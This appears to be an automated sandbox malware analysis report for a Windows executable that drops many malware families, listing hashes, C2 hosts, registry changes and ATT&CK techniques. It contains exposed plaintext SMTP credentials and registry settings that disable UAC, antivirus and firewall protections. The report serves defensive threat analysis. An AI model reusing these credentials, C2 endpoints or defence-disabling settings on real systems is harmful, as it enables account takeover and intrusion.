berbew | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
1200s
max time network
1203s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
20-11-2024 06:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
bham.ac.uk
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
cuda.infonext.com.mx
Port:
587
Username:
[email protected]
Password:
ItEnAn260617

Extracted

Credentials

Protocol: smtp
Host:
smtp.juno.com
Port:
587
Username:
[email protected]
Password:
butthou12

Extracted

Credentials

Protocol: smtp
Host:
mail.petrolimex.com.vn
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
securesmtp.trash-mail.com
Port:
587
Username:
[email protected]

Extracted

Credentials

Protocol: smtp
Host:
smtp.juno.com
Port:
587
Username:
[email protected]
Password:
7Ladybug!

Extracted

Family

xworm

Version

5.0

enter-sierra.gl.at.ply.gg:55389

Mutex

lzS6Ul7Mo5UcN6CR

Attributes

Install_directory
%AppData%
install_file
Wave.exe

aes.plain

Extracted

Family

stealc

Botnet

default

http://185.215.113.17

http://91.202.233.158

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

meshagent

Version

Botnet

group

http://94.131.119.184:443/agent.ashx

Attributes

mesh_id
0x1BB80B7BD3F37219BF6F79BEE0A08A00B90168972309CA4BFD812814A9F980439E71B51CC08CC59D904B5AED18647DD0
server_id
B13800B3094163CC81EA68335E6D9A9B98350B3D697F92D49A06C6ADC9519150B766816EBC90ED105D4749F3F47F60B6
wss
wss://94.131.119.184:443/agent.ashx

Extracted

Family

phorphiex

http://185.215.113.66

Attributes

mutex
Klipux

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

89.105.223.196:29862

Extracted

Family

redline

Botnet

30072024

185.215.113.67:40960

Extracted

Family

berbew

http://f/wcmd.htm

http://f/ppslog.php

http://f/piplog.php?%s:%i:%i:%s:%09u:%i:%02d:%02d:%02d

Signatures

Berbew
Berbew is a backdoor written in C++.
backdoor berbew
Berbew family
berbew
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x000d00000002b9f1-34973.dat	family_vidar_v7

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002aae3-8.dat	family_xworm
behavioral1/memory/32-16-0x00000000006A0000-0x00000000006E2000-memory.dmp	family_xworm
behavioral1/files/0x001a00000002afec-25127.dat	family_xworm
behavioral1/files/0x000d00000002b9e5-34294.dat	family_xworm

Detects MeshAgent payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0004000000025b8b-3092.dat	family_meshagent

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Emotet family
emotet
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe

Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 6 IoCs

resource	yara_rule
behavioral1/files/0x001d00000002aafc-3040.dat	family_phorphiex
behavioral1/files/0x000400000000f406-5498.dat	family_phorphiex
behavioral1/files/0x001a00000002ab36-11291.dat	family_phorphiex
behavioral1/files/0x001900000002ad9d-20382.dat	family_phorphiex
behavioral1/files/0x001b00000002b00d-25031.dat	family_phorphiex
behavioral1/files/0x000f00000002b9b7-33507.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	55888	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	55144	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56332	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56420	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56504	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56552	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56580	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56636	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56792	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56844	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56880	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56716	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56964	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57024	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57104	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57160	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57240	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57296	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56344	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	55888	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	40084	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57364	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58444	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	59248	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	59268	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58972	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56672	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57556	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	56864	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58176	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58248	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	57824	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	54252	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	55444	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	59336	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	59280	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	55512	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58240	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	53664	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	58792	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	54872	3672	Process not Found	133
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4464	3672	Process not Found	133

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ad83-20190.dat	family_quasar
behavioral1/files/0x001b00000002aff4-25021.dat	family_quasar
behavioral1/files/0x000d00000002b8de-31724.dat	family_quasar
behavioral1/files/0x000d00000002b945-32466.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 10 IoCs

resource	yara_rule
behavioral1/memory/2644-5493-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/files/0x001a00000002ab60-15241.dat	family_redline
behavioral1/memory/17868-15278-0x0000000000E80000-0x0000000000ED2000-memory.dmp	family_redline
behavioral1/files/0x001900000002b023-25115.dat	family_redline
behavioral1/files/0x001900000002b031-26358.dat	family_redline
behavioral1/files/0x001100000002b505-29656.dat	family_redline
behavioral1/files/0x000d00000002b77f-30883.dat	family_redline
behavioral1/files/0x0004000000025b75-32792.dat	family_redline
behavioral1/files/0x0003000000025d94-33001.dat	family_redline
behavioral1/files/0x000d00000002b9b4-33468.dat	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001900000002b023-25115.dat	family_sectoprat

Sectoprat family
sectoprat

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002b038-26465.dat	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5376 created 3216	5376	2014831613.exe	53
PID 5376 created 3216	5376	2014831613.exe	53

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Windows security bypass 2 TTPs 12 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x001900000002b053-26824.dat	family_xmrig
behavioral1/files/0x001900000002b053-26824.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x001500000002b9b5-33761.dat	dcrat
behavioral1/files/0x000e00000002b9cb-33804.dat	dcrat

Emotet payload 1 IoCs

Detects Emotet payload in memory.

trojan banker

resource	yara_rule
behavioral1/files/0x000d00000002b9bc-33586.dat	emotet

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4432	powershell.exe
38780	Process not Found
892	powershell.exe
2428	powershell.exe
1736	powershell.exe
8788	Process not Found
49568	Process not Found
4636	powershell.exe
3380	powershell.exe
3532	powershell.exe
6064	powershell.exe
10452	powershell.exe
24444	powershell.exe
6200	Process not Found
9412	Process not Found
37192	Process not Found
38780	Process not Found
52900	Process not Found

Contacts a large (1490) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
28732	Process not Found

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4812	netsh.exe
72	netsh.exe
5596	netsh.exe
1320	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2652	attrib.exe
40700	Process not Found

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" "	meshagent32-group.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe	Runtime Broker.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe	Runtime Broker.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wave.lnk	XClient.exe

Executes dropped EXE 41 IoCs

pid	Process
32	XClient.exe
2752	3544436.exe
2244	NOTallowedtocrypt.exe
2220	76y5trfed675ytg.exe
3152	GoodFrag.exe
1468	Runtime Broker.exe
2820	m.exe
3920	c2.exe
4088	j4vzzuai.exe
948	sysvplervcs.exe
456	stealc_default.exe
5008	j4vzzuai.exe
2220	Installeraus.exe
1952	meshagent32-group.exe
2788	MeshAgent.exe
4820	Wave.exe
2380	Cbmefxrmnv.exe
3904	r.exe
2484	wwbizsrvs.exe
5404	Cbmefxrmnv.exe
5576	2232519369.exe
5800	Wave.exe
5820	hwbpwd.exe
5788	685410430.exe
5644	av_downloader.exe
5968	AV_DOW~1.EXE
3864	wow.exe
4636	svchost.exe
1576	247805573.exe
1824	3132929399.exe
2512	kmvcsaed.exe
1260	OGFN%20Updater.exe
3920	crypted.exe
5268	tdrpload.exe
2072	sysppvrdnvs.exe
5376	2014831613.exe
5928	needmoney.exe
1072	hwbpwd.exe
2844	winupsecvmgr.exe
4116	svchost015.exe
4136	loader.exe

Loads dropped DLL 5 IoCs

pid	Process
2752	3544436.exe
456	stealc_default.exe
456	stealc_default.exe
3864	wow.exe
3864	wow.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x001900000002ae43-22824.dat	themida
behavioral1/files/0x001000000002b91f-32633.dat	themida
behavioral1/files/0x0002000000025c53-32871.dat	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0003000000000689-5443.dat	vmprotect
behavioral1/memory/4636-5448-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp	vmprotect
behavioral1/memory/4636-5451-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp	vmprotect
behavioral1/files/0x000700000002a67d-33455.dat	vmprotect

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysvplervcs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .."	Runtime Broker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe"	m.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\VolumeInfo = "C:\\Users\\Admin\\AppData\\Roaming\\VolumeInfo.exe"	Cbmefxrmnv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wave = "C:\\Users\\Admin\\AppData\\Roaming\\Wave.exe"	XClient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	76y5trfed675ytg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	76y5trfed675ytg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .."	Runtime Broker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	tdrpload.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	NOTallowedtocrypt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	NOTallowedtocrypt.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs

Web Service

T1102

flow	ioc
3131	yandex.com
6655	raw.githubusercontent.com
15326	raw.githubusercontent.com
1	raw.githubusercontent.com
88	raw.githubusercontent.com
129	raw.githubusercontent.com
4400	raw.githubusercontent.com
10155	raw.githubusercontent.com
4	raw.githubusercontent.com
133	raw.githubusercontent.com
134	raw.githubusercontent.com
3131	raw.githubusercontent.com
4899	raw.githubusercontent.com
11046	yandex.com
13474	yandex.com
15419	raw.githubusercontent.com
130	raw.githubusercontent.com
135	raw.githubusercontent.com
2747	yandex.com
79	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4886	api.ipify.org
4932	api.ipify.org
4983	ip-api.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4528	GameBarPresenceWriter.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wkernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\wntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\wuser32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4576053A75C8E1F3EF58305A622D150B328341E7	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\SysWOW64\dbgcore.pdb	MeshAgent.exe
